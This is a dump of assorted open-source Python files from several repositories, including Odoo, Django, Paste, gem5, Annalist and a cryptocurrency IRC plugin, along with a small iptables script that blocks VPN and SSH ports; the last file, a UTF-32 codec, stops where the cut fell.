repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
---|---|---|---|---|
incaser/odoo-odoo | refs/heads/8.0 | addons/l10n_de/__init__.py | 693 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
garymardell/libgraphqlparser | refs/heads/master | ast/cxx.py | 12 | # Copyright (c) 2015, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import cStringIO as StringIO
from casing import title
from license import C_LICENSE_COMMENT
class Printer(object):
def __init__(self):
self._type_name = None
# Map concrete type to base class
self._bases = {}
# HACK: Defer everything we print so that forward declarations for
# all classes come first. Avoids having to do 2 passes over the
# input file.
self._deferredOutput = StringIO.StringIO()
self._fields = []
def start_file(self):
print C_LICENSE_COMMENT + '''/** @generated */
#pragma once
#include "AstNode.h"
#include <memory>
#include <string>
#include <utility>
#include <vector>
namespace facebook {
namespace graphql {
namespace ast {
// The parser uses strdup to move from yytext to the heap, so we need
// to use free instead of delete.
struct CDeleter {
void operator()(const char *p) const { free((void *)p); }
};
'''
def end_file(self):
print
print self._deferredOutput.getvalue()
print '}'
print '}'
print '}'
def _base_class(self, type):
return self._bases.get(type, 'Node')
def start_type(self, name):
self._type_name = name
base = self._base_class(name)
# non-deferred!
print 'class %s;' % name
print >> self._deferredOutput, 'class %s : public %s {' % (name, base)
self._fields = []
def field(self, type, name, nullable, plural):
if type == 'OperationKind':
type = 'string'
self._fields.append((type, name, nullable, plural))
def end_type(self, name):
self._print_fields()
print >> self._deferredOutput, ' public:'
self._print_constructor()
print >> self._deferredOutput
self._print_destructor_prototype()
print >> self._deferredOutput
self._print_noncopyable()
print >> self._deferredOutput
self._print_getters()
print >> self._deferredOutput, ' void accept(visitor::AstVisitor *visitor) override;'
print >> self._deferredOutput, '};'
print >> self._deferredOutput
print >> self._deferredOutput
self._type_name = None
self._fields = []
def _storage_type(self, type):
if type == 'string':
return 'std::unique_ptr<const char, CDeleter>'
elif type == 'boolean':
return 'bool'
else:
return 'std::unique_ptr<%s>' % type
def _print_fields(self):
for (type, name, nullable, plural) in self._fields:
storage_type = self._storage_type(type)
if plural:
storage_type = 'std::unique_ptr<std::vector<%s>>' % storage_type
print >> self._deferredOutput, ' %s %s_;' % (storage_type, name)
def _ctor_singular_type(self, type):
if type == 'string':
return 'const char *'
elif type == 'boolean':
return 'bool'
else:
return '%s *' % type
def _ctor_plural_type(self, type):
return 'std::vector<%s> *' % self._storage_type(type)
def _print_constructor(self):
print >> self._deferredOutput, ' explicit %s(' % self._type_name
print >> self._deferredOutput, ' const yy::location &location%s' % (',' if self._fields else '')
def ctor_arg(type, name, plural):
if plural:
ctor_type = self._ctor_plural_type(type)
else:
ctor_type = self._ctor_singular_type(type)
return ' %s %s' % (ctor_type, name)
print >> self._deferredOutput, ',\n'.join(ctor_arg(type, name, plural)
for (type, name, nullable, plural) in self._fields)
print >> self._deferredOutput, ' )'
def ctor_init(type, name, plural):
# Strings are const char *, just pass.
# Vectors are passed by pointer and we take ownership.
# Node types are passed in by pointer and we take ownership.
value = name
return ' %s_(%s)' % (name, value)
print >> self._deferredOutput, ' : %s(location)%s' % (self._base_class(self._type_name), ',' if self._fields else '')
print >> self._deferredOutput, ',\n'.join(ctor_init(type, name, plural)
for (type, name, nullable, plural)
in self._fields)
print >> self._deferredOutput, ' {}'
def _getter_type(self, type, nullable, plural):
if plural and nullable:
return 'const std::vector<%s>*' % self._storage_type(type)
elif plural:
return 'const std::vector<%s>&' % self._storage_type(type)
if type == 'string':
assert not nullable
return 'const char *'
elif type == 'boolean':
assert not nullable
return 'bool'
elif nullable:
return 'const %s*' % type
else:
return 'const %s&' % type
def _getter_value_to_return(self, raw_value, type, nullable, plural):
if plural and nullable:
return raw_value + '.get()'
elif plural:
return '*%s' % raw_value
elif type == 'boolean':
return raw_value
elif nullable or type == 'string':
return '%s.get()' % raw_value
else:
return '*%s' % raw_value
def _print_getters(self):
for (type, name, nullable, plural) in self._fields:
print >> self._deferredOutput, ' %s get%s() const' % (
self._getter_type(type, nullable, plural),
title(name))
print >> self._deferredOutput, ' { return %s; }' % (
self._getter_value_to_return(name + '_', type, nullable, plural))
print >> self._deferredOutput
def _print_destructor_prototype(self):
print >> self._deferredOutput, ' ~%s() {}' % self._type_name
def _print_noncopyable(self):
print >> self._deferredOutput, ' %s(const %s&) = delete;' % (
self._type_name, self._type_name)
print >> self._deferredOutput, ' %s& operator=(const %s&) = delete;' % (
self._type_name, self._type_name)
def start_union(self, name):
self._type_name = name
# non-deferred!
print 'class %s;' % name
print >> self._deferredOutput, 'class %s : public Node {' % name
print >> self._deferredOutput, ' public:'
self._print_constructor()
print >> self._deferredOutput, '};'
print >> self._deferredOutput
def union_option(self, type):
assert type not in self._bases, '%s cannot appear in more than one union!' % type
self._bases[type] = self._type_name
def end_union(self, name):
pass
|
ahmed-mahran/hue | refs/heads/master | desktop/core/ext-py/Paste-2.0.1/tests/test_request.py | 47 | # (c) 2005 Ben Bangert
# This module is part of the Python Paste Project and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from paste.fixture import *
from paste.request import *
from paste.wsgiwrappers import WSGIRequest
import six
def simpleapp(environ, start_response):
status = '200 OK'
response_headers = [('Content-type','text/plain')]
start_response(status, response_headers)
request = WSGIRequest(environ)
body = [
'Hello world!\n', 'The get is %s' % str(request.GET),
' and Val is %s\n' % request.GET.get('name'),
'The languages are: %s\n' % request.languages,
'The accepttypes is: %s\n' % request.match_accept(['text/html', 'application/xml'])]
if six.PY3:
body = [line.encode('utf8') for line in body]
return body
def test_gets():
app = TestApp(simpleapp)
res = app.get('/')
assert 'Hello' in res
assert "get is MultiDict([])" in res
res = app.get('/?name=george')
res.mustcontain("get is MultiDict([('name', 'george')])")
res.mustcontain("Val is george")
def test_language_parsing():
app = TestApp(simpleapp)
res = app.get('/')
assert "The languages are: ['en-us']" in res
res = app.get('/', headers={'Accept-Language':'da, en-gb;q=0.8, en;q=0.7'})
assert "languages are: ['da', 'en-gb', 'en', 'en-us']" in res
res = app.get('/', headers={'Accept-Language':'en-gb;q=0.8, da, en;q=0.7'})
assert "languages are: ['da', 'en-gb', 'en', 'en-us']" in res
def test_mime_parsing():
app = TestApp(simpleapp)
res = app.get('/', headers={'Accept':'text/html'})
assert "accepttypes is: ['text/html']" in res
res = app.get('/', headers={'Accept':'application/xml'})
assert "accepttypes is: ['application/xml']" in res
res = app.get('/', headers={'Accept':'application/xml,*/*'})
assert "accepttypes is: ['text/html', 'application/xml']" in res
def test_bad_cookie():
env = {}
env['HTTP_COOKIE'] = '070-it-:><?0'
assert get_cookie_dict(env) == {}
env['HTTP_COOKIE'] = 'foo=bar'
assert get_cookie_dict(env) == {'foo': 'bar'}
env['HTTP_COOKIE'] = '...'
assert get_cookie_dict(env) == {}
env['HTTP_COOKIE'] = '=foo'
assert get_cookie_dict(env) == {}
env['HTTP_COOKIE'] = '?='
assert get_cookie_dict(env) == {}
|
diego1996/subterfuge | refs/heads/master | modules/TunnelBlock/TunnelBlock.py | 25 | #!/usr/bin/python
import os
#SSH Tunnels
os.system("iptables -A FORWARD -p tcp --destination-port 22 -j DROP")
#PPTP Tunnels
os.system("iptables -A FORWARD -p tcp --destination-port 1723 -j DROP")
#L2TP Tunnels
os.system("iptables -A FORWARD -p udp --destination-port 500 -j DROP")
os.system("iptables -A FORWARD -p udp --destination-port 4500 -j DROP")
#Cisco IPSec Tunnels
os.system("iptables -A FORWARD -p udp --destination-port 10000 -j DROP")
#OpenVPN Tunnels
os.system("iptables -A FORWARD -p udp --destination-port 1194 -j DROP")
|
waseem18/oh-mainline | refs/heads/master | vendor/packages/Django/django/contrib/gis/utils/geoip.py | 114 | import warnings
from django.contrib.gis import geoip
HAS_GEOIP = geoip.HAS_GEOIP
if HAS_GEOIP:
BaseGeoIP = geoip.GeoIP
GeoIPException = geoip.GeoIPException
class GeoIP(BaseGeoIP):
def __init__(self, *args, **kwargs):
warnings.warn('GeoIP class has been moved to `django.contrib.gis.geoip`, and '
'this shortcut will disappear in Django v1.6.',
DeprecationWarning, stacklevel=2)
super(GeoIP, self).__init__(*args, **kwargs)
|
Victor-Haefner/polyvr | refs/heads/master | extras/analytics/computeIncludeGraph.py | 1 | #!/usr/bin/python
import os, fnmatch, subprocess
import numpy, Gnuplot # sudo apt install python-gnuplot
import datetime
from PIL import Image
from time import sleep
sourceDir = '../../src'
#sourceDir = 'testData'
resolution = '8000, 8000'
def add(L, F, R):
if not F in L: L[F] = R+'/'+F
else: print 'Warning!', F, 'allready present (', L[F], ',', R+'/'+F, ')'
def getIncludes(path):
includes = []
for line in open(path):
if '#include' in line: includes.append(line)
return includes
def getFile(include, includeGraph):
for File in includeGraph:
if File in include: return File
#return include
def openImg(path):
img = Image.open(path)
img.show()
class Plot:
def __init__(self):
print 'init graph'
self.g = Gnuplot.Gnuplot()
self.g.title("PolyVR Code Analytics, Include Graph")
self.g("set grid")
self.g("set xtic 1")
self.g("set ytic 1")
#self.g('set terminal x11 size 2000, 1000')
self.g('set terminal png size '+resolution)
#self.g('set size 2,2')
self.edges = []
self.nodes = []
print ' done'
def draw(self):
print 'draw'
vectorsX0 = []
vectorsY0 = []
vectorsX = []
vectorsY = []
points = []
for e in self.edges:
vectorsX0.append(e[1][0])
vectorsY0.append(e[1][1])
vectorsX.append(e[0][0]-e[1][0])
vectorsY.append(e[0][1]-e[1][1])
for n in self.nodes:
points.append([n[0], n[1]])
self.g('set label "'+n[2]+'" at '+str(n[0]-0.1)+','+str(n[1])+' font "Sans,10"')
d1 = Gnuplot.Data(vectorsX0, vectorsY0, vectorsX, vectorsY, title="", with_="vectors")
d2 = Gnuplot.Data(points, title="", with_="points")
self.g.plot(d1, d2)
self.g.hardcopy (filename='/tmp/polyvr.png', terminal='png') # write last plot to another terminal
sleep(7)
openImg('/tmp/polyvr.png')
input("Press Enter to continue...")
print ' done'
def addEdge(self, p0,p1):
self.edges.append([p0,p1])
def addNode(self, pos, name):
self.nodes.append(pos+[name])
class Analytics:
def __init__(self):
self.headers = {}
self.sources = {}
self.positions = {}
self.dependsGraph = {} # key is file name, value is list of files included
self.includeGraph = {} # key is file name, value is list of files that include it
self.layers = [[]]
def traverseSources(self, sourceDir):
for root, Dir, files in os.walk(sourceDir):
for item in fnmatch.filter(files, "*.h"): add(self.headers, item, root)
for item in fnmatch.filter(files, "*.cpp"): add(self.sources, item, root)
print 'N headers:', len(self.headers)
print 'N sources:', len(self.sources)
# fill depends graph
for name, path in self.headers.items(): self.dependsGraph[name] = getIncludes(path)
for name, path in self.sources.items(): self.dependsGraph[name] = getIncludes(path)
for name, path in self.headers.items(): self.includeGraph[name] = []
for name, includes in self.dependsGraph.items():
newIncludes = []
for include in includes:
f = getFile(include, self.headers)
if f: newIncludes.append(f)
self.dependsGraph[name] = newIncludes
# fill include graph
for name, includes in self.dependsGraph.items():
for include in includes:
if include in self.includeGraph:
if not name in self.includeGraph[include]: self.includeGraph[include].append(name)
def computeLayers(self):
processedFiles = {}
def getNewLayer(layer, layers):
ref = layer[:]
newLayer = []
for f in layer:
if not f in self.includeGraph: continue
for includer in self.includeGraph[f]:
if includer in processedFiles: processedFiles[includer].remove(includer)
newLayer.append(includer)
processedFiles[includer] = newLayer
if ref == newLayer:
del layers[-1]
layers.append(newLayer)
return []
return newLayer
def addNextLayer(layer, layers):
if len(layers) > 20: return # safety check
newLayer = getNewLayer(layer, layers)
if len(newLayer) > 0:
layers.append(newLayer)
addNextLayer(newLayer, layers)
for header in self.headers:
if len(self.dependsGraph[header]) == 0 and len(self.includeGraph[header]) > 0:
self.layers[0].append(header)
addNextLayer(self.layers[0], self.layers)
def computePositions(self):
for j,layer in enumerate(self.layers):
for i,f in enumerate(layer):
if not f in self.positions: self.positions[f] = [j+0.1, -i-0.1]
def drawGraph():
P = Plot()
for label, pos in A.positions.items(): P.addNode(pos, label)
for name, includes in A.dependsGraph.items():
for include in includes:
if name in A.positions and include in A.positions:
P.addEdge(A.positions[name], A.positions[include])
P.draw()
compilationTimes = {}
totalTime = 0
def getCompilationTimes():
def runCompilation(h):
with open("testMain.cpp") as f: lines = f.readlines()
lines[0] = '#include "'+A.headers[h]+'"\n'
with open("testMain.cpp", "w") as f: f.writelines(lines)
cmd = "codeblocks -ni -ns --multiple-instance --target='Release' --rebuild PolyVR_18.04.cbp > /dev/null"
ta = datetime.datetime.now()
os.system(cmd)
tb = datetime.datetime.now()
return (tb - ta).total_seconds()
i = 0
tA = datetime.datetime.now()
for header in A.headers:
print 'compile header:', header,
compilationTimes[header] = runCompilation(header)
print compilationTimes[header]
i += 1
#if i == 5: break
tB = datetime.datetime.now()
return (tB - tA).total_seconds()
def countImpact(): # compute how many source files the header impacts
def countIncludes(header, processed):
processed.append(header)
if header in A.includeGraph:
for f in A.includeGraph[header]:
if not f in processed: countIncludes(f, processed)
import random, operator
Ndepends = {}
for header in A.headers:
processed = []
countIncludes(header, processed)
Nc = 0
Nh = 0
for p in processed:
if p[-4:] == '.cpp': Nc+=1
if p[-2:] == '.h': Nh+=1
Ndepends[header] = (Nh, processed, Nc)
Ndepends = sorted(Ndepends.items(), key=operator.itemgetter(1,0))
for h in Ndepends:
#print len(h[1][1]), h
print h[0], ' '*(40-len(h[0])), len(A.includeGraph[h[0]]), '\t,', h[1][2], '\t/', len(A.sources), '\t,', h[1][0], '\t/', len(A.headers), '\t- ',
if h[0] in compilationTimes: print compilationTimes[h[0]], ' s'
else: print ' '
print 'total compilation time:', totalTime
A = Analytics()
A.traverseSources(sourceDir)
A.computeLayers()
A.computePositions()
totalTime = getCompilationTimes()
countImpact()
#drawGraph()
|
ihatevim/aetherbot | refs/heads/master | plugins/cryptocurrency.py | 3 | """
cryptocurrency.py
A plugin that uses the CoinMarketCap JSON API to get values for cryptocurrencies.
Created By:
- Luke Rogers <https://github.com/lukeroge>
Special Thanks:
- https://coinmarketcap-nexuist.rhcloud.com/
License:
GPL v3
"""
from urllib.parse import quote_plus
from datetime import datetime
import requests
from cloudbot import hook
API_URL = "https://coinmarketcap-nexuist.rhcloud.com/api/{}"
# aliases
@hook.command("bitcoin", "btc", autohelp=False)
def bitcoin():
""" -- Returns current bitcoin value """
# alias
return crypto_command("btc")
@hook.command("litecoin", "ltc", autohelp=False)
def litecoin():
""" -- Returns current litecoin value """
# alias
return crypto_command("ltc")
@hook.command("dogecoin", "doge", autohelp=False)
def dogecoin():
""" -- Returns current dogecoin value """
# alias
return crypto_command("doge")
# main command
@hook.command("crypto", "cryptocurrency")
def crypto_command(text):
""" <ticker> -- Returns current value of a cryptocurrency """
try:
encoded = quote_plus(text)
request = requests.get(API_URL.format(encoded))
request.raise_for_status()
except (requests.exceptions.HTTPError, requests.exceptions.ConnectionError) as e:
return "Could not get value: {}".format(e)
data = request.json()
if "error" in data:
return "{}.".format(data['error'])
updated_time = datetime.fromtimestamp(float(data['timestamp']))
if (datetime.today() - updated_time).days > 2:
# the API retains data for old ticker names that are no longer updated
# in these cases we just return a "not found" message
return "Currency not found."
change = float(data['change'])
if change > 0:
change_str = "\x033 {}%\x0f".format(change)
elif change < 0:
change_str = "\x035 {}%\x0f".format(change)
else:
change_str = "{}%".format(change)
return "{} // \x0307${:,.2f}\x0f USD - {:,.7f} BTC // {} change".format(data['symbol'].upper(),
float(data['price']['usd']),
float(data['price']['btc']),
change_str)
|
basicthinker/Sexain-MemController | refs/heads/master | gem5-stable/src/arch/x86/isa/insts/general_purpose/__init__.py | 91 | # Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
categories = ["arithmetic",
"cache_and_memory_management",
"compare_and_test",
"control_transfer",
"data_conversion",
"data_transfer",
"flags",
"input_output",
"load_effective_address",
"load_segment_registers",
"logical",
"no_operation",
"rotate_and_shift",
"semaphores",
"string",
"system_calls"]
microcode = '''
# Microcode for general purpose instructions
'''
for category in categories:
exec "import %s as cat" % category
microcode += cat.microcode
|
farin/django-enroll | refs/heads/master | enroll/backends.py | 1 | from django.contrib.auth.backends import ModelBackend as DjangoModelBackend
from django.contrib.auth import get_user_model
from django.db.models.query_utils import Q
from django.conf import settings
class ModelBackend(DjangoModelBackend):
"""Extended authentication backend"""
supports_inactive_user = getattr(settings, 'ENROLL_AUTH_BACKEND_INACTIVE_USER', True )
#should contains only unique columns !!!
login_attributes = getattr(settings, 'ENROLL_AUTH_BACKEND_LOGIN_ATTRIBUTES', ['username'] )
def find_user_by_login(self, login):
combined = None
for login_attr in self.login_attributes:
q = Q(**{login_attr: login})
combined = q if combined is None else combined | q
return get_user_model().objects.get(combined)
def authenticate_user(self, user, password, request=None):
return user if user.check_password(password) else None
def authenticate(self, username=None, password=None, request=None):
try:
user = self.find_user_by_login(username)
return self.authenticate_user(user, password, request)
except get_user_model().DoesNotExist:
return None
#class SignUpBackend(object):
|
gklyne/annalist | refs/heads/master | src/annalist_root/annalist/tests/test_entityeditdupfield.py | 1 | from __future__ import unicode_literals
from __future__ import absolute_import, division, print_function
"""
Entity editing tests for duplicated fields
"""
__author__ = "Graham Klyne ([email protected])"
__copyright__ = "Copyright 2014, G. Klyne"
__license__ = "MIT (http://opensource.org/licenses/MIT)"
import os
import unittest
import logging
log = logging.getLogger(__name__)
from django.conf import settings
from django.db import models
from django.http import QueryDict
from django.contrib.auth.models import User
from django.test import TestCase # cf. https://docs.djangoproject.com/en/dev/topics/testing/tools/#assertions
from django.test.client import Client
from utils.SuppressLoggingContext import SuppressLogging
from annalist.identifiers import RDF, RDFS, ANNAL
from annalist import layout
from annalist.models.entitytypeinfo import EntityTypeInfo
from annalist.models.site import Site
from annalist.models.collection import Collection
from annalist.models.recordtype import RecordType
from annalist.models.recordlist import RecordList
from annalist.models.recordview import RecordView
from annalist.models.recordfield import RecordField
from annalist.models.recordtypedata import RecordTypeData
from annalist.models.entitydata import EntityData
from annalist.views.form_utils.fieldchoice import FieldChoice
from .AnnalistTestCase import AnnalistTestCase
from .tests import (
test_layout,
TestHost, TestHostUri, TestBasePath, TestBaseUri, TestBaseDir
)
from .init_tests import (
init_annalist_test_site, init_annalist_test_coll, resetSitedata
)
from .entity_testfielddesc import get_field_description, get_bound_field
from .entity_testutils import (
collection_create_values,
continuation_url_param,
create_test_user,
context_view_field,
context_bind_fields,
context_field_row
)
from .entity_testtypedata import (
recordtype_url,
recordtype_edit_url,
recordtype_create_values,
)
from .entity_testviewdata import (
recordview_url,
recordview_create_values, recordview_values, recordview_values_add_field,
)
from .entity_testentitydata import (
entity_url, entitydata_edit_url,
entitydata_value_keys,
entitydata_create_values, entitydata_values, entitydata_values_add_field,
default_view_form_data, entitydata_form_add_field,
default_view_context_data,
default_comment
)
from .entity_testsitedata import (
get_site_types, get_site_types_sorted, get_site_types_linked,
get_site_lists, get_site_lists_sorted,
get_site_list_types, get_site_list_types_sorted,
get_site_views, get_site_views_sorted,
get_site_field_groups, get_site_field_groups_sorted,
get_site_fields, get_site_fields_sorted,
get_site_field_types, get_site_field_types_sorted,
)
# -----------------------------------------------------------------------------
#
# Helper function to buiold tyest context value
#
# -----------------------------------------------------------------------------
def dupfield_view_context_data(
entity_id=None, orig_id=None,
coll_id="testcoll", type_id="testtype",
type_ref=None, type_choices=None, type_ids=[],
entity_label=None,
entity_descr=None,
entity_descr2=None,
entity_descr3=None,
record_type="annal:EntityData",
action=None, update="Entity", view_label="RecordView testcoll/DupField_view",
continuation_url=None
):
context_dict = default_view_context_data(
entity_id=entity_id, orig_id=orig_id,
coll_id=coll_id, type_id=type_id,
type_ref=type_ref, type_choices=type_choices, type_ids=type_ids,
entity_label=entity_label, entity_descr=entity_descr,
record_type=record_type,
action=action, update=update, view_label=view_label,
continuation_url=continuation_url
)
context_dict['fields'].append(
context_field_row(
get_bound_field("Entity_comment", entity_descr2,
name="Entity_comment__2",
prop_uri="rdfs:comment__2"
)
)
)
context_dict['fields'].append(
context_field_row(
get_bound_field("Entity_comment", entity_descr3,
name="Entity_comment__3",
prop_uri="rdfs:comment_alt"
)
)
)
return context_dict
# -----------------------------------------------------------------------------
#
# Entity edit duplicated field tests
#
# -----------------------------------------------------------------------------
class EntityEditDupFieldTest(AnnalistTestCase):
def setUp(self):
init_annalist_test_site()
self.testsite = Site(TestBaseUri, TestBaseDir)
self.testcoll = Collection.create(self.testsite, "testcoll",
collection_create_values("testcoll")
)
self.testtype = RecordType.create(self.testcoll, "testtype",
recordtype_create_values("testcoll", "testtype")
)
self.testdata = RecordTypeData.create(self.testcoll, "testtype", {})
# Create view with repeated field id
self.viewdata = recordview_create_values(view_id="DupField_view")
recordview_values_add_field(
self.viewdata,
field_id="Entity_comment",
field_placement="small:0,12"
)
recordview_values_add_field(
self.viewdata,
field_id="Entity_comment",
field_property_uri="rdfs:comment_alt",
field_placement="small:0,12"
)
self.testview = RecordView.create(self.testcoll, "DupField_view", self.viewdata)
# Other data
self.type_ids = get_site_types_linked("testcoll")
self.type_ids.append(FieldChoice("_type/testtype",
label="RecordType testcoll/_type/testtype",
link=recordtype_url("testcoll", "testtype")
))
# Login and permissions
create_test_user(self.testcoll, "testuser", "testpassword")
self.client = Client(HTTP_HOST=TestHost)
loggedin = self.client.login(username="testuser", password="testpassword")
self.assertTrue(loggedin)
return
def tearDown(self):
# resetSitedata(scope="collections")
return
@classmethod
def tearDownClass(cls):
return
@classmethod
def tearDownClass(cls):
super(EntityEditDupFieldTest, cls).tearDownClass()
resetSitedata(scope="collections") #@@checkme@@
return
# -----------------------------------------------------------------------------
# Helpers
# -----------------------------------------------------------------------------
def _check_record_view_values(self, view_id, view_values):
"Helper function checks content of record view entry with supplied view_id"
self.assertTrue(RecordView.exists(self.testcoll, view_id))
t = RecordView.load(self.testcoll, view_id)
self.assertEqual(t.get_id(), view_id)
self.assertDictionaryMatch(t.get_values(), view_values)
return t
def _create_entity_data(self,
entity_id, type_id="testtype", update="Entity",
comment2="Comment field 2",
comment3="Comment field 3"
):
"Helper function creates entity data with supplied entity_id"
v = entitydata_create_values(entity_id, type_id=type_id, update=update)
v = entitydata_values_add_field(v, "rdfs:comment", 2, comment2)
v = entitydata_values_add_field(v, "rdfs:comment_alt", 3, comment3)
e = EntityData.create(self.testdata, entity_id, v)
return e
def _check_entity_data_values(self,
entity_id, type_id="testtype", update="Entity",
comment2="Comment field 2",
comment3="Comment field 3"
):
"Helper function checks content of form-updated record type entry with supplied entity_id"
# log.info("_check_entity_data_values: type_id %s, entity_id %s"%(type_id, entity_id))
typeinfo = EntityTypeInfo(self.testcoll, type_id)
self.assertTrue(typeinfo.entityclass.exists(typeinfo.entityparent, entity_id))
e = typeinfo.entityclass.load(typeinfo.entityparent, entity_id)
self.assertEqual(e.get_id(), entity_id)
v = entitydata_values(entity_id, type_id=type_id, update=update)
v = entitydata_values_add_field(v, "rdfs:comment", 2, comment2)
v = entitydata_values_add_field(v, "rdfs:comment_alt", 3, comment3)
self.assertDictionaryMatch(e.get_values(), v)
return e
# -----------------------------------------------------------------------------
# Form response tests
# -----------------------------------------------------------------------------
def test_view_dup_field_values(self):
self._check_record_view_values("DupField_view", self.viewdata)
return
def test_dup_field_display(self):
# Create entity with duplicate fields
self._create_entity_data("entitydupfield")
self._check_entity_data_values(
"entitydupfield", type_id="testtype", update="Entity",
comment2="Comment field 2",
comment3="Comment field 3"
)
# Display entity in view with duplicate fields
u = entitydata_edit_url(
"edit", "testcoll", "testtype",
entity_id="entitydupfield",
view_id="DupField_view"
)
r = self.client.get(u)
self.assertEqual(r.status_code, 200)
self.assertEqual(r.reason_phrase, "OK")
# Check display context
expect_context = dupfield_view_context_data(
coll_id="testcoll", type_id="testtype",
entity_id="entitydupfield", orig_id=None,
type_ref="testtype", type_choices=self.type_ids,
entity_label="Entity testcoll/testtype/entitydupfield",
entity_descr="Entity coll testcoll, type testtype, entity entitydupfield",
entity_descr2="Comment field 2",
entity_descr3="Comment field 3",
record_type="/testsite/c/testcoll/d/_type/testtype/",
action="edit",
update="Entity",
continuation_url=""
)
self.assertEqual(len(r.context['fields']), 5)
self.assertDictionaryMatch(context_bind_fields(r.context), expect_context)
def test_dup_field_update(self):
# Create entity with duplicate fields
self._create_entity_data("entitydupfield")
self._check_entity_data_values(
"entitydupfield", type_id="testtype", update="Entity",
comment2="Comment field 2",
comment3="Comment field 3"
)
# Post form data to update entity
u = entitydata_edit_url(
"edit", "testcoll", "testtype",
entity_id="entitydupfield",
view_id="DupField_view"
)
f = default_view_form_data(
entity_id="entitydupfield",
type_id="testtype",
coll_id="testcoll",
action="edit", update="Updated Entity"
)
f = entitydata_form_add_field(f, "Entity_comment", 2, "Update comment 2")
f = entitydata_form_add_field(f, "Entity_comment", 3, "Update comment 3")
r = self.client.post(u, f)
self.assertEqual(r.status_code, 302)
self.assertEqual(r.reason_phrase, "Found")
# Test resulting entity value
self._check_entity_data_values(
"entitydupfield", type_id="testtype", update="Updated Entity",
comment2="Update comment 2",
comment3="Update comment 3"
)
return
# End.
|
steventimberman/masterDebater | refs/heads/master | venv/lib/python2.7/site-packages/django/contrib/sitemaps/management/__init__.py | 12133432 | |
fafaman/django | refs/heads/master | tests/migrations/migrations_test_apps/with_package_model/models/__init__.py | 12133432 | |
vipins/ccccms | refs/heads/master | env/Lib/encodings/utf_32.py | 375 | """
Python 'utf-32' Codec
"""
import codecs, sys
### Codec APIs
encode = codecs.utf_32_encode
def decode(input, errors='strict'):
return codecs.utf_32_decode(input, errors, True)
class IncrementalEncoder(codecs.IncrementalEncoder):
def __init__(self, errors='strict'):
codecs.IncrementalEncoder.__init__(self, errors)
self.encoder = None
def encode(self, input, final=False):
if self.encoder is None:
result = codecs.utf_32_encode(input, self.errors)[0]
if sys.byteorder == 'little':
self.encoder = codecs.utf_32_le_encode
else:
self.encoder = codecs.utf_32_be_encode
return result
return self.encoder(input, self.errors)[0]
def reset(self):
codecs.IncrementalEncoder.reset(self)
self.encoder = None
def getstate(self):
# state info we return to the caller:
# 0: stream is in natural order for this platform
# 2: endianness hasn't been determined yet
# (we're never writing in unnatural order)
return (2 if self.encoder is None else 0)
def setstate(self, state):
if state:
self.encoder = None
else:
if sys.byteorder == 'little':
self.encoder = codecs.utf_32_le_encode
else:
self.encoder = codecs.utf_32_be_encode
class IncrementalDecoder(codecs.BufferedIncrementalDecoder):
def __init__(self, errors='strict'):
codecs.BufferedIncrementalDecoder.__init__(self, errors)
self.decoder = None
def _buffer_decode(self, input, errors, final):
if self.decoder is None:
(output, consumed, byteorder) = \
codecs.utf_32_ex_decode(input, errors, 0, final)
if byteorder == -1:
self.decoder = codecs.utf_32_le_decode
elif byteorder == 1:
self.decoder = codecs.utf_32_be_decode
elif consumed >= 4:
raise UnicodeError("UTF-32 stream does not start with BOM")
return (output, consumed)
return self.decoder(input, self.errors, final)
def reset(self):
codecs.BufferedIncrementalDecoder.reset(self)
self.decoder = None
def getstate(self):
# additonal state info from the base class must be None here,
# as it isn't passed along to the caller
state = codecs.BufferedIncrementalDecoder.getstate(self)[0]
# additional state info we pass to the caller:
# 0: stream is in natural order for this platform
# 1: stream is in unnatural order
# 2: endianness hasn't been determined yet
if self.decoder is None:
return (state, 2)
